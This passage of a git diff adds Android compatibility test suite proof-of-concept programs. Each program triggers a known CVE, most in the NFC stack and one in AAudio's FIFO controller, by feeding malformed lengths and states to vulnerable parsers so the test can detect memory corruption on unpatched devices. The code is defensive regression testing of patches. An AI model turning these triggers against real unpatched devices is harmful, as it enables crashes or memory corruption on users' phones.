VPX_ENCODER_ABI_VERSION); + + if (codec_return != VPX_CODEC_OK) { + return EXIT_FAILURE; + } + unsigned char *source = (unsigned char *)memalign(16, (ENCODE_WIDTH * ENCODE_HEIGHT * 3 / 2)); + if (!source) { + return EXIT_FAILURE; + } + memset(source, 0, (ENCODE_WIDTH * ENCODE_HEIGHT * 3 / 2)); + vpx_image_t (*func_ptr4)(vpx_image_t *, vpx_img_fmt_t, unsigned int, unsigned int, unsigned int, + unsigned char *) = + (vpx_image(*)(vpx_image *, vpx_img_fmt, unsigned int, unsigned int, unsigned int, + unsigned char *))dlsym(libHandle, "vpx_img_wrap"); + if (!func_ptr4) { + dlclose(libHandle); + free(source); + return EXIT_FAILURE; + } + (*func_ptr4)(&raw_frame, VPX_IMG_FMT_I420, ENCODE_WIDTH, ENCODE_HEIGHT, 1, source); + vpx_codec_err_t (*func_ptr5)(vpx_codec_ctx_t *, const vpx_image_t *, vpx_codec_pts_t, + unsigned long, vpx_enc_frame_flags_t, unsigned long) = + (vpx_codec_err_t(*)(vpx_codec_ctx *, const vpx_image *, long, unsigned long, long, + unsigned long))dlsym(libHandle, "vpx_codec_encode"); + if (!func_ptr5) { + dlclose(libHandle); + free(source); + return EXIT_FAILURE; + } + codec_return = + (*func_ptr5)(&mCodecContext, &raw_frame, framerate, + (uint32_t)(((uint64_t)1000000 << 16) / framerate), 0, VPX_DL_REALTIME); + if (codec_return != VPX_CODEC_OK) { + free(source); + return EXIT_FAILURE; + } + vpx_codec_err_t (*func_ptr6)(vpx_codec_ctx_t *) = + (vpx_codec_err_t(*)(vpx_codec_ctx *))dlsym(libHandle, "vpx_codec_destroy"); + if (!func_ptr6) { + dlclose(libHandle); + free(source); + return EXIT_FAILURE; + } + (*func_ptr6)(&mCodecContext); + enable_selective_overload = ENABLE_NONE; + dlclose(libHandle); + free(source); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/Android.bp new file mode 100644 index 00000000000..ac45cc9edfe --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/Android.bp @@ -0,0 +1,34 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2018-9558", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ], + compile_multilib: "64", + shared_libs: [ + "libnfc-nci", + ], + include_dirs: [ + "system/nfc/src/nfc/include", + "system/nfc/src/gki/common", + "system/nfc/src/gki/ulinux", + "system/nfc/src/include", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/poc.cpp new file mode 100644 index 00000000000..e20c0f222d0 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/poc.cpp @@ -0,0 +1,50 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include "../includes/common.h" +#include <stdlib.h> + +#include <nfc_api.h> +#include <rw_int.h> + +#define INITIAL_VALUE 0xBE +#define NUM_BYTES 1 + +extern tRW_CB rw_cb; +void rw_init(void); +void rw_t2t_handle_rsp(uint8_t *p_data); + +void poc_cback(tRW_EVENT event, tRW_DATA *p_rw_data) { + (void)event; + (void)p_rw_data; +} + +int main() { + tRW_T2T_CB *p_t2t = &rw_cb.tcb.t2t; + rw_init(); + rw_cb.p_cback = &poc_cback; + p_t2t->state = RW_T2T_STATE_DETECT_TLV; + p_t2t->tlv_detect = TAG_LOCK_CTRL_TLV; + p_t2t->substate = RW_T2T_SUBSTATE_WAIT_READ_TLV_VALUE; + p_t2t->found_tlv = TAG_LOCK_CTRL_TLV; + p_t2t->bytes_count = NUM_BYTES; + p_t2t->tlv_value[1] = UINT8_MAX; + uint8_t *base_ptr = (uint8_t *)(p_t2t->lockbyte + RW_T1T_MAX_LOCK_BYTES); + memset((void *)base_ptr, INITIAL_VALUE, sizeof(tRW_T1T_LOCK)); + uint8_t data[T2T_READ_DATA_LEN]; + rw_t2t_handle_rsp(data); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/Android.bp new file mode 100644 index 00000000000..86b23dc67f5 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/Android.bp @@ -0,0 +1,37 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2018-9561", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/ulinux/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/poc.cpp new file mode 100644 index 00000000000..6c4ccf2bc1c --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/poc.cpp @@ -0,0 +1,41 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <stdlib.h> +#include <string.h> +#include "llcp_api.h" + +#define DEFAULT_VALUE 0x06 +#define SIZE 16 +#define LENGTH 1 + +extern tLLCP_STATUS llcp_util_parse_connect(uint8_t* p_bytes, uint16_t length, + tLLCP_CONNECTION_PARAMS* p_params); + +int main() { + const int32_t offset = SIZE - LENGTH; + uint8_t* p_bytes = (uint8_t *)malloc(SIZE); + if (!p_bytes) { + return EXIT_FAILURE; + } + memset(p_bytes, DEFAULT_VALUE, SIZE); + + tLLCP_CONNECTION_PARAMS params; + llcp_util_parse_connect(&p_bytes[offset], LENGTH, ¶ms); + + free(p_bytes); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/Android.bp new file mode 100644 index 00000000000..f6254384846 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/Android.bp @@ -0,0 +1,37 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2018-9563", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/ulinux/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/poc.cpp new file mode 100644 index 00000000000..e0211145680 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/poc.cpp @@ -0,0 +1,41 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <stdlib.h> +#include <string.h> +#include <llcp_api.h> + +#define DEFAULT_VALUE 0x02 +#define SIZE 16 +#define LENGTH 1 + +extern tLLCP_STATUS llcp_util_parse_cc(uint8_t* p_bytes, uint16_t length, + uint16_t* p_miu, uint8_t* p_rw); + +int main() { + const int32_t offset = SIZE - LENGTH; + uint8_t* p_bytes = (uint8_t *)malloc(SIZE); + if (!p_bytes) { + return EXIT_FAILURE; + } + memset(p_bytes, DEFAULT_VALUE, SIZE); + + tLLCP_CONNECTION_PARAMS params; + llcp_util_parse_cc(&p_bytes[offset], LENGTH, &(params.miu), &(params.rw)); + + free(p_bytes); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/Android.bp new file mode 100644 index 00000000000..0813445fe70 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/Android.bp @@ -0,0 +1,40 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2018-9584", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/gki/ulinux/", + "system/nfc/src/nfa/include/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/poc.cpp new file mode 100644 index 00000000000..94aa6429c4a --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/poc.cpp @@ -0,0 +1,49 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include "../includes/common.h" +#include "../includes/memutils.h" +#include <nfc_int.h> + +#define LENGTH 16 + +char enable_selective_overload = ENABLE_NONE; +extern tNFC_CB nfc_cb; + +static void resp_cback(tNFC_RESPONSE_EVT event, tNFC_RESPONSE *p_data) { + (void) event; + (void) p_data; +} + +int main() { + nfc_cb.p_resp_cback = resp_cback; + + enable_selective_overload = ENABLE_ALL; + uint8_t *p_msg = (uint8_t *)malloc(LENGTH); + if (!p_msg) { + return EXIT_FAILURE; + } + + // Set evt_data.set_config.status + *p_msg = 0x03; + // Set evt_data.set_config.num_param_id + *(p_msg + 1) = 255; + nfc_ncif_set_config_status(p_msg, LENGTH); + + free(p_msg); + enable_selective_overload = ENABLE_NONE; + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/Android.bp new file mode 100644 index 00000000000..8bbdd4fbed6 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/Android.bp @@ -0,0 +1,40 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2018-9585", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/gki/ulinux/", + "system/nfc/src/nfa/include/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/poc.cpp new file mode 100644 index 00000000000..7227adff091 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/poc.cpp @@ -0,0 +1,48 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include "../includes/common.h" +#include "../includes/memutils.h" +#include <nfc_int.h> + +#define LENGTH 16 + +char enable_selective_overload = ENABLE_NONE; +extern tNFC_CB nfc_cb; + +static void resp_cback(tNFC_RESPONSE_EVT event, tNFC_RESPONSE* p_data) { + (void) event; + (void) p_data; +} + +int main() { + nfc_cb.p_resp_cback = resp_cback; + + enable_selective_overload = ENABLE_ALL; + uint8_t *p_msg = (uint8_t *)malloc(LENGTH); + if (!p_msg) { + return EXIT_FAILURE; + } + memset(p_msg, 0x01, LENGTH); + + // Set evt_data.tlv_size + *(p_msg + 5) = 200; + nfc_ncif_proc_get_routing(p_msg, LENGTH); + + free(p_msg); + enable_selective_overload = ENABLE_NONE; + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/Android.bp new file mode 100644 index 00000000000..83150843142 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/Android.bp @@ -0,0 +1,29 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ +cc_test { + name: "CVE-2019-2007", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ], + shared_libs: [ + "libaaudio_internal", + ], + include_dirs: [ + "frameworks/av/media/libaaudio/src", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/poc.cpp new file mode 100644 index 00000000000..7f8ebdb0b0f --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/poc.cpp @@ -0,0 +1,39 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include "../includes/common.h" +#include "fifo/FifoBuffer.h" +#include "fifo/FifoController.h" +#include <stdlib.h> + +#define CAPACITY 83 +#define THRESHOLD 47 +#define NUM_FRAMES -9999999999 + +using android::FifoController; + +int main() { + FifoController fifoController(CAPACITY, THRESHOLD); + fifoController.advanceReadIndex((android::fifo_frames_t)NUM_FRAMES); + fifoController.advanceWriteIndex((android::fifo_frames_t)NUM_FRAMES); + int32_t readIndex = fifoController.getReadIndex(); + int32_t writeIndex = fifoController.getWriteIndex(); + + if ((readIndex < 0) || (writeIndex < 0)) { + return EXIT_VULNERABLE; + } + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/Android.bp new file mode 100644 index 00000000000..7ffdd65281e --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/Android.bp @@ -0,0 +1,39 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2019-2013", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/gki/ulinux/", + ], + shared_libs: [ + "libnfc-nci", + ], + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/poc.cpp new file mode 100644 index 00000000000..23098acdf43 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/poc.cpp @@ -0,0 +1,168 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <nfc_int.h> +#include <rw_int.h> +#include <dlfcn.h> + +#include "../includes/common.h" +#include "../includes/memutils.h" + +#define T3T_MSG_FELICALITE_MC_OFFSET 0x01 + +char enable_selective_overload = ENABLE_NONE; + +extern tRW_CB rw_cb; +extern tNFC_CB nfc_cb; +void rw_init(void); +tNFC_STATUS rw_t3t_select(uint8_t peer_nfcid2[NCI_RF_F_UID_LEN], + uint8_t mrti_check, uint8_t mrti_update); + +static void (*real_GKI_freebuf)(void* ptr) = nullptr; +void *kAllocatedPointers[2]; +int allocatedPointersIndex = -1; +bool kIsInitialized = false; + +void init(void) { + real_GKI_freebuf = (void (*)(void*))dlsym(RTLD_NEXT, "_Z11GKI_freebufPv"); + if (!real_GKI_freebuf) { + return; + } + + kIsInitialized = true; +} + +void GKI_freebuf(void* ptr) { + if (!kIsInitialized) { + init(); + } + if (ptr == kAllocatedPointers[0] || ptr == kAllocatedPointers[1]) { + return; + } else { + real_GKI_freebuf(ptr); + } +} + +void *allocate_memory(size_t size) { + void *ptr = malloc(size); + memset(ptr, 0x0, size); + kAllocatedPointers[++allocatedPointersIndex] = ptr; + return ptr; +} + +// borrowed from rw_i93.cc +enum { + RW_T3T_CMD_DETECT_NDEF, + RW_T3T_CMD_CHECK_NDEF, + RW_T3T_CMD_UPDATE_NDEF, + RW_T3T_CMD_CHECK, + RW_T3T_CMD_UPDATE, + RW_T3T_CMD_SEND_RAW_FRAME, + RW_T3T_CMD_GET_SYSTEM_CODES, + RW_T3T_CMD_FORMAT, + RW_T3T_CMD_SET_READ_ONLY_SOFT, + RW_T3T_CMD_SET_READ_ONLY_HARD, + + RW_T3T_CMD_MAX +}; + +// borrowed from rw_i93.cc +enum { + RW_T3T_STATE_NOT_ACTIVATED, + RW_T3T_STATE_IDLE, + RW_T3T_STATE_COMMAND_PENDING +}; + +// borrowed from rw_i93.cc +enum { + /* Sub states for formatting Felica-Lite */ + RW_T3T_FMT_SST_POLL_FELICA_LITE, /* Waiting for POLL Felica-Lite response (for + formatting) */ + RW_T3T_FMT_SST_CHECK_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl) + block-read to complete */ + RW_T3T_FMT_SST_UPDATE_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl) + block-write to complete */ + RW_T3T_FMT_SST_UPDATE_NDEF_ATTRIB, /* Waiting for NDEF attribute block-write + to complete */ + + /* Sub states for setting Felica-Lite read only */ + RW_T3T_SRO_SST_POLL_FELICA_LITE, /* Waiting for POLL Felica-Lite response (for + setting read only) */ + RW_T3T_SRO_SST_UPDATE_NDEF_ATTRIB, /* Waiting for NDEF attribute block-write + to complete */ + RW_T3T_SRO_SST_CHECK_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl) + block-read to complete */ + RW_T3T_SRO_SST_UPDATE_MC_BLK /* Waiting for Felica-Lite MC (MemoryControl) + block-write to complete */ +}; + +void cback(uint8_t c __attribute__((unused)), + tRW_DATA* d __attribute__((unused))) { +} + +int main() { + + enable_selective_overload = ENABLE_ALL; + tRW_T3T_CB* p_t3t = &rw_cb.tcb.t3t; + + GKI_init(); + rw_init(); + + uint8_t peer_nfcid2[NCI_RF_F_UID_LEN]; + uint8_t mrti_check = 1, mrti_update = 1; + if (rw_t3t_select(peer_nfcid2, mrti_check, mrti_update) != NFC_STATUS_OK) { + return EXIT_FAILURE; + } + + tNFC_CONN *p_data = (tNFC_CONN *) allocate_memory(sizeof(tNFC_CONN)); + if (!p_data) { + return EXIT_FAILURE; + } + p_data->data.p_data = (NFC_HDR *) allocate_memory(sizeof(NFC_HDR) * 4); + if (!(p_data->data.p_data)) { + free(p_data); + return EXIT_FAILURE; + } + p_data->status = NFC_STATUS_OK; + + p_t3t->cur_cmd = RW_T3T_CMD_SET_READ_ONLY_HARD; + p_t3t->rw_state = RW_T3T_STATE_COMMAND_PENDING; + p_t3t->rw_substate = RW_T3T_SRO_SST_CHECK_MC_BLK; + + NFC_HDR* p_msg = (p_data->data).p_data; + p_msg->len = T3T_MSG_RSP_COMMON_HDR_LEN; + + uint8_t* p_t3t_rsp = (uint8_t*) (p_msg + 1) + (p_msg->offset + 1); + p_t3t_rsp[T3T_MSG_RSP_OFFSET_RSPCODE] = T3T_MSG_OPC_CHECK_RSP; + p_t3t_rsp[T3T_MSG_RSP_OFFSET_STATUS1] = T3T_MSG_RSP_STATUS_OK; + + uint8_t* p_mc = &p_t3t_rsp[T3T_MSG_RSP_OFFSET_CHECK_DATA]; + p_mc[T3T_MSG_FELICALITE_MC_OFFSET_SYS_OP] = T3T_MSG_FELICALITE_MC_OFFSET; + + tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; + tNFC_CONN_EVT event = NFC_DATA_CEVT; + TIMER_LIST_ENT pFirst = { }; + nfc_cb.quick_timer_queue.p_first = &pFirst; + + rw_cb.p_cback = &cback; + p_cb->p_cback(0, event, p_data); + + free(p_data->data.p_data); + free(p_data); + + enable_selective_overload = ENABLE_NONE; + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/Android.bp new file mode 100644 index 00000000000..b5a7b9969ca --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/Android.bp @@ -0,0 +1,34 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2019-2014", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/include", + "system/nfc/src/gki/common", + "system/nfc/src/nfc/include", + "system/nfc/src/gki/ulinux/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/poc.cpp new file mode 100644 index 00000000000..26c607e9865 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/poc.cpp @@ -0,0 +1,60 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <rw_int.h> +#include <stdlib.h> + +#include "../includes/common.h" + +// borrowed from rw_t3t.cc +#define RW_T3T_SENSF_RES_RD_OFFSET 17 +#define RW_T3T_SENSF_RES_RD_LEN 2 +#define DEFAULT_VALUE 0xBE + +extern tRW_CB rw_cb; +void rw_init(void); +void cback(uint8_t, tRW_DATA *) {} + +void GKI_start_timer(uint8_t, int32_t, bool) {} + +void GKI_stop_timer(uint8_t) {} + +int main() { + tRW_T3T_CB *p_cb = &rw_cb.tcb.t3t; + + GKI_init(); + rw_init(); + rw_cb.p_cback = &cback; + + for (int n = 0; n < NCI_NFCID2_LEN; ++n) { + p_cb->peer_nfcid2[n] = DEFAULT_VALUE; + } + + p_cb->num_system_codes = T3T_MAX_SYSTEM_CODES; + p_cb->flags = RW_T3T_FL_W4_GET_SC_POLL_RSP; + + uint8_t nci_status = NCI_STATUS_OK; + uint8_t num_responses = 1; + uint8_t sensf_res_buf_size = + RW_T3T_SENSF_RES_RD_OFFSET + RW_T3T_SENSF_RES_RD_LEN; + uint8_t *p_sensf_res_buf = + (uint8_t *)malloc(RW_T3T_SENSF_RES_RD_OFFSET + RW_T3T_SENSF_RES_RD_LEN); + rw_t3t_handle_nci_poll_ntf(nci_status, num_responses, sensf_res_buf_size, + p_sensf_res_buf); + + free(p_sensf_res_buf); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/Android.bp new file mode 100644 index 00000000000..fe6619120ad --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/Android.bp @@ -0,0 +1,38 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2019-2019", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + 